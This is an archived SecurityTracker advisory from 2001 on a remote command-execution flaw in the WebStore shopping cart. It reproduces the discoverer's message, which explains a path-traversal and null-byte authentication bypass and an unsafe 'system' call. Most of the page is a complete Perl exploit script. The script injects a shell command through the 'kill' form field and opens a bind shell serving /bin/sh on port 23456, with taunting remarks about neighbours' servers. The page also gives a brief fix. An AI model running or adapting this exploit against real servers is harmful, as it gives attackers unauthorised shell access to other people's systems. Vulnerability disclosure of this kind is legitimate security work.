SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Commerce)  >   WebStore Vendors:   RDC Software
WebStore Shopping Cart Allows Remote Users to Execute Commands on the Server
SecurityTracker Alert ID:  1001737
SecurityTracker URL:  http://securitytracker.com/id/1001737
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 13 2001
Impact:   Execution of arbitrary code via network
Exploit Included:  Yes  

Description:   A vulnerability has been reported in the WebStore shopping cart software that allows remote users to execute arbitrary shell commands on the server with the permissions of the web server.

The ws_mail.cgi is reported to unsafely process user-submitted data, allowing remote authenticated administrators to pass data to the 'system' command. However, the Library/WSSecurity.pl script reportedly allows remote users to bypass authentication. As a result, remote users can execute commands on the server without authentication.

The vendor has reportedly been notified.

A demonstration exploit script is included in the Source Message.

Impact:   A remote user can execute commands on the server with the permissions of the web server.
Solution:   No solution was available at the time of this entry. The author of the report has provided a suggested workaround (see the Source Message).
Vendor URL:  www.cgicentral.net/ (Links to External Site)
Cause:   Authentication error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  bug


Hi,
I'm reposting a bug I've found some time before.
Thanks

WebStore from www.cgicentral.net is a shopping cart allowing users to buy things on-line.
One of the scripts in the package, ws_mail.cgi unsafely passes user-submitted data to
'system' command:
if ($in{'terminate'}) {
        eval { system("kill $in{'kill'}") } if defined($in{'kill'});
This command can only be issued by an authenticated administrator.
Another script in the package, Library/WSSecurity.pl allows us to bypass verification:
in sub verify_user:
if ($filename) {
                $file = $user_directory.'/'.$filename.'.usr';
                open(FILE, $file) || &logon_html('Access Error');
                while (<FILE>) { @fields = split(/\|/) }
                close(FILE);
                if (-M $file > .02) {
                        &write_open($file,'');
                        print FILE join ('|', @fields);
                        close(FILE);
                        system("chmod 666 $file");
                }
                $fullname  = "\L\u$fields[2] "."\L\u$fields[3]";
                return ($filename, $fullname, $fields[1]);
        }
Variable $filename is passed by the user, and we can specify any file that we think
exists on the system that is readable and writeable by us, with or without path
traversal (the ../../ stuff) and get rid of the '.usr' bit by whacking a nul at the end
of $filename. This allows us to authenticate enough to issue the kill command.

The authors were contacted a week ago, I received no reply from them.

Suggested workaround:
One way to fix the unsafe system command is to substitute all instances of
system("kill $in{'kill'}" for
system("kill", "$in{'kill'}")
system in a list context is safe to use.

The vulnerability was found, exploit written and workaround suggested by:
Igor Dobrovitski noident@my-deja.com

Exploit:


#!/usr/bin/perl -w
# Sun, May 6, 2001
# exploit by Igor Dobrovitski, noident@my-deja.com
# The exploit is for the default set-up. A good way to test if your (your neighbour's :) server
# is vulnerable. Only for Unix, will now work on NT
# Enjoy
use Socket;
$| = 1;
####################################################################################################
$msgfile = '../../Statistics/WebStore_Access.counter';
$userfile = '../Statistics/WebStore_Access.counter';
# if the sploit doesn't work with the above values, comment them out and uncomment ones below
#$msgfile = '../../ws_delete_files.cron';
#$userfile = '../ws_delete_files.cron';
# or these if the above fails:
#$msgfile = '../../Statistics/index.html';
#$userfile = '../Statistics/index.html';
$exec_code = 'use Socket;$protocol = getprotobyname(tcp);socket(SOCK, PF_INET, SOCK_STREAM, $protocol)
;setsockopt(SOCK, SOL_SOCKET, SO_REUSEADDR, 1);$port=23456;bind(SOCK, sockaddr_in($port, INADDR_ANY));
listen(SOCK, 1);accept (NEW, SOCK);if(!fork()){open STDIN, "<&NEW"; open STDOUT, ">&NEW";open STDERR, 
">&NEW";exec "/bin/sh -i"}else{close NEW;exit;}';
####################################################################################################
unless(defined $ARGV[0]) {die "Usage: $0 www.example.com/cgi-bin/ws_mail.cgi\n"}
$ARGV[0] =~ s|^(?:http://)*(.*/).*(\..*)$|${1}ws_mail$2|;
($host, $scriptpath) = $ARGV[0] =~ m|^(.*?)(/.*)$|;
$userfile .= '\0';
$sh_cmd = '55555;perl=\'perl\';test -x /usr/bin/perl && perl=\'/usr/bin/perl\';test -x /usr/local/bin/
perl && perl=\'/usr/local/bin/perl\';$perl -e \'' . $exec_code . '\'';
# the above is what's passed to the 'system' command as part of an argument
$form = makeform({'userfile' => $userfile, 'kill' => $sh_cmd, 'terminate' => 'whatever',
                  'admin' => 'yep', 'restart' => 'pls', 'msgfile' => $msgfile});
print "Engaging the enemy. Please stand by...\n";
$SIG{ALRM} = sub { print STDERR "Timeout was expected. The shell awaits you on port 23456\nHave fun an
d be nice to the server.\n"; exit };
alarm(20);
&send($form);
&oops_the_sploit_did_not_work();

sub makeform
{
    my $string;
    my @blah;
    my $line  = '';
    my $here;
    my %data = %{$_[0]};
    foreach my $key (keys %data)
    {
        $line .= "$key" . 'AAAA' . "$data{$key}" . 'BBBB';
    }
    $line =~ s|^(.*)BBBB$|$1|;
    $line =~ s/\\n/\n/g;
    $line =~ s/\\t/\t/g;
    $line =~ s/\\e/\e/g;
    $line =~ s/\\f/\f/g;
    $line =~ s/\\r/\r/g;
    $line =~ s/\\0/\0/g;
    foreach my $char (split //, $line)
    {
        if($char !~ m/[A-Za-z0-9._ ]/)
        {
            $char = unpack "H2", $char;
            $char = '%' . "$char";
        }
        push @blah, $char;
    }
    $string = join "",@blah;
    $string =~ s/AAAA/=/g;
    $string =~ s/BBBB/&/g;
    $string =~ s/ /+/g;
    my $cont_len = length($string);
$here = <<EOF;
POST $scriptpath HTTP/1.0
User-Agent: Mozilla (Windows 98)
Host: $host
referer: $host
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
Content-type: application/x-www-form-urlencoded
Content-length: $cont_len

$string
EOF
    return $here;
}

sub send
{
    my $form_to_send = shift;
    my $h = inet_aton($host) or die "Forward lookup for $host failed\n";
    socket(S,PF_INET,SOCK_STREAM,6) or die "socket prolems\n";
    unless(connect(S,sockaddr_in(80,$h))) {print STDERR "Couldn't connect to " . inet_ntoa($h) . "\n"
; close(S); exit 1 }
    select(S);
    $|=1;
    print "$form_to_send";
    my @reply=<S>;
    select(STDOUT);
    close(S);
    return @reply;
}

sub oops_the_sploit_did_not_work
{
    print STDERR "The exploit didn't work on this host\nSorry...\n";
    exit;
}




------------------------------------------------------------
--== Sent via Deja.com ==--
http://www.deja.com/

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC